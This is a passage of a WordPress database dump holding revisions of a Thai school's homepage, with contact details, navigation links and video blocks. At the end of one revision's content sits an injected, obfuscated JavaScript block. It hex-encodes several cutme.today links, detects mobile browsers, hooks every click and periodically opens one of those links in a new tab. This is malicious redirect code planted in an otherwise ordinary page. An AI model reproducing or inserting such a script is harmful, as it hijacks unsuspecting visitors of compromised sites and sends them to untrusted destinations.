{\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-28 09:46:00','2024-08-28 02:46:00','',19,'http://watprato.ssk.in.th/?p=237',0,'revision','',0),
(238,2,'2024-08-28 09:47:58','2024-08-28 02:47:58','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"m